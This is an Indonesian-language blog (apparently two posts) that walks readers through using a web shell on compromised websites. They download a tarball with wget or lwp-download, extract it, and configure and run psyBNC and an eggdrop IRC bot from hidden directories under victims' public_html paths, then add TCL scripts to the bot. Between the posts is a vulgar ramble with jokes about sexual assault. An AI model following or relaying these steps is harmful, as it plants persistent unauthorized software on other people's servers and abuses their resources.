http://www.geocities.com/wisnu_amanda/wisnoee.tar.gz enter kedalam command execute, kemudian klik execute , kalo ga berhasil, coba pake command lwp-download . ngerti cara nya?? ganti aja wget nya dengan lwp-download...heheheheeh... masih ga berhasil juga ?? hmmm.. kalo gitu coba kamu download aja file nya... http://www.geocities.com/wisnu_amanda/wisnoee.tar.gz , abis itu baru upload lagi ke target kamu... caranya ? tinggal browse aja dmana kamu naro file nya kemudian klik upload file.

5. tar -zxvf wisnoee.tar.gz enter kedalam command execute, kemudian klik execute

6. rm -fr wisnoee.tar.gz enter kedalam command execute, kemudian klik execute

7.

a. Tambahkan di change dir /AhoK contoh setelah ditambah :

/home/muveszet/public_html/spaw/imagesszobor/AhoK

b. ./config (ident) (port) enter kedalam command execute, kemudian klik execute,

contoh : ./config wisnoee 1986

ident = user id kamu
port = terserah kamu mau isi berapa minimal 4 karakter deh

8. ./fuck enter kedalam command execute, kemudian klik execute

9. ./run enter kedalam command execute, kemudian klik execute

10. selesai !!

kemudian masuk ke server yang tidak lain adalah nama web inject tersebut (example.com) dan juga portnya. commandnya adalah /server example.com port
contoh : /server example.com 9999

jika masuk, akan ada permintaan untuk memasukkan password maka ketik /pass paswordkamu contoh : /pass wisnoeejelek

hmm.. abis tu masukkan server irc ke dalam psyBNCnya dengan command /addserver ircserver:port contoh : /addserver irc.dal.net:6667

maka dia akan konek ke server dalnet dengan port 6667

selanjutnya silahkan ketik /bhelp untuk melihat command2 didalem psy...

dah ngerti dums...kalo masih ga ngerti2 juga, bakar aja monitor didepan kamu itu !!

Selamat mencoba !!!

Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Aku menunggu muuu.....menunggumuuu...

MENUNGGuMUuuuuUu...

Mati didepankuuu...didepankuuu....

Didepan KuuUUuuuUUuu....

uhukkzz... !!!

sambil denger music enaknnyah napain yahh...hmm...

rokok ?? dah abesSSSs... ( masih ada sihh, cuman tinggal hana2 nya sebatanggggg..)

chattingg..?? tiapp haree kaleee...bosennn...

ngantuk sihh.. pleZZ laFerr sangadddd...tapi blon bisa tidurr nihh... andai aja ada yang dateng bawain nasi goreng telorrr + sateeeEEe.....

wah2 .. ga kebayang dehh..

kalo laki2 gw jadiin budakk.. ... kalo ce...dijadiin apa ya enakk nyaa..... gw jadiin tukang masak aja dehh...

UUuEeniwEeiiiii ....kan lagi nungguin sisa2 kalonggg malem ini..alias userr geblekkk enehhh...

yg dibilang geblek sih ga geblek2 amattTT... hehehhee

....shhhttTTTt.. jangan keras2... orang nya denger tuhhhHh.. hehehehe

oiyaappp...


sambil nyanyi2 ga karuan,dan sambil bikin bete yg denger... mendingan sembari kita share ilmu yang ga seberapa ini... nambah2 pahala kan gpp, biar ga sengsara2 amattt ntar di Nerakaa....

Disamping itu juga gw ga mau cuma gw aja yg berbuat dosa... bagi2lah dosanya...walu kapasitas nya sedikitt... ( jangan cuma mau enaknya aja looo !!! )

GikiranN uDdah jadi Bot nya aja minta dijoinin ke mana2...ZZZzzzzZZzz...

please nu joinin bot lu ke #blablabla...
nu ada bot ga ?? joinin ke #blablabla dongg ...
bot lu banyak tuh , joinin sih ke #blablabla...

uekkkzzz... !! sekali dua kali sih enjoy2 aja..
lama2 koqw pala gw jadi panas denger itu2 moloo...

Pernah mekeerr ga udah berapa banyak dosa yg gw tanggung !! ( blon termasuk dosa waktu gw ngebobol perawan anak orang sehhh ... ato dosa waktu gw ML sama kambingg ... ) bcanda..2...

nyengir dikit napa... ga ngehargain gw bangeedd sehhh !!!

Gak2... gw ga kayak gitu koQq...

gw ini kalemm.. sekalem2 nya ummaatt...

WwwooKEehh.. ga usah panjang lebar lg...langsung aja topic kita pagi ini adalah gmana cara nya masukin / nambah tcl pada bot... ( eggdrop / game )

gmana???

SetojjooooOOooo ???

yang setojooo buka celaanaaaAAaaaa.... ( UUuupPPpZZzz !!! )

yeah paling ga ... make over dikit lah bot kamu....

udah muka kamu nya kayak kaleng krupuk pecah gitu... bot nya jelekan lagii.. ga bangeddd dehhh...

ok !! mari kita mulai....

Kamu dah tau dunk cara buat bot... kalo belon coba lihat postingan saya kemaren2, kamu bisa lihat disini

setelah bot jadi... jangan di close dulu inject-an kamu...ada baiknya kamu tambah lagi otak bot kamu.. biar pinteran dikit...hehehehe

cara nya adalah..

1. tambahkan di change dir nya /scripts

contoh : kan setelah run bot change dir kamu adalah

/home/penna/public_html/mambots/content/.dev12 , setelah ditambah menjadi :

/home/penna/public_html/mambots/content/.dev12/scripts

2. nah sekarang baru kita masukin source tcl tsb ke dalam target inject-an kamu itu...

cara nya ??

bisa di wget melalui command execute... contoh :

http://www.geocities.com/wisnu_amanda/tcl/ip.tcl

tapi berhubung url diatas blon ada di geocities saya.... silahkan ikuti cara kedua..

yaitu.. kamu download dulu source tcl tsb ke komputer kamu ( di bawah nanti saya kasih beberapa tcl yang saya punya ). dah selesai download, kamu buka dulu source tcl nya.. kalo ada yg perlu diedit silahkan di edit ( ada beberapa jenis tcl sih yg perlu diedit... cerewet.tcl contoh nya, kalo ga di edit nama chanel nya ga bakalan bisa jalan itu tcl )

dah selesai...kamu upload lagi tcl nya ke target kamu... inget dir nya masih tetep pada /scripts alias /home/penna/public_html/mambots/content/.dev12/scripts


3. selesai upload... kamu hilangkan /scripts ( kembali seperti semula ), yaitu

/home/penna/public_html/mambots/content/.dev12

4. ./tcl -t a.txt namafile.tcl ketik ke command execute trus enter .. contoh :

./tcl -t a.txt cerewet.tcl

kalo berhasil nanti ada tampilan seperti ini..

-------------------------
Chanary Tcl Tools 1.0
by ChanarySoft Team 2004
-------------------------

cerewet.tcl telah ditambahkan pada dir scripts


Gitulah kira2...

Trus pv bot kamu ketik !rehash selesai dehh... !!

Selamat Mencobaa yaa !!! Sampai ketemu lagi di Neraka !!




Nb : nih dia tcl yang pernah saya dapettt ... kamu bisa download disini ... sengaja saya buat satu2.. biar eluu ada kerjaaan dikit getohhh... !!!

Sebelum dipakai di rename dulu extensinya menjadi ".tcl" ... gampang kan...
contoh: astro.txt setelah di-rename menjadi astro.tcl

astro.txt
badnick.txt
ary.txt
away.txt
astaga.txt
cerewet.txt
bulan.txt
busuk.txt
dns.txt
cute.txt
flood.txt
google.txt
hiburan.txt
http.txt
irclordz2.txt
ip.txt
irclordz.txt
informasi.txt
ngoceh.txt
portcheck.txt
mp3.txt
ping.txt
mutiara.txt
timebomb.txt
seen.txt
salam.txt
scramble.txt
slaps.txt
whois.txt
version.txt


Sebelum dipakai di rename dulu extensinya menjadi ".tcl" ... gampang kan...
contoh: astro.txt setelah di-rename menjadi astro.tcl


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !

Baca lanjutannya yukss ..
Diposting oleh Admin Label:






Klik Iklan Sih... Beramal Dikit Napa... hehehe..
Thanks To :
"Thanks ya atas kunjungannya

Ini cuma blog asal2an, asal jadi
Mohon maaf jika ada yang tidak
Berkenan dihati

Mohon Tinggalkan pesan
Di Box yang tersedia
Insya Allah saya akan melakukan
linkback ke blog kamu.

Terima kasih

********

wisnoee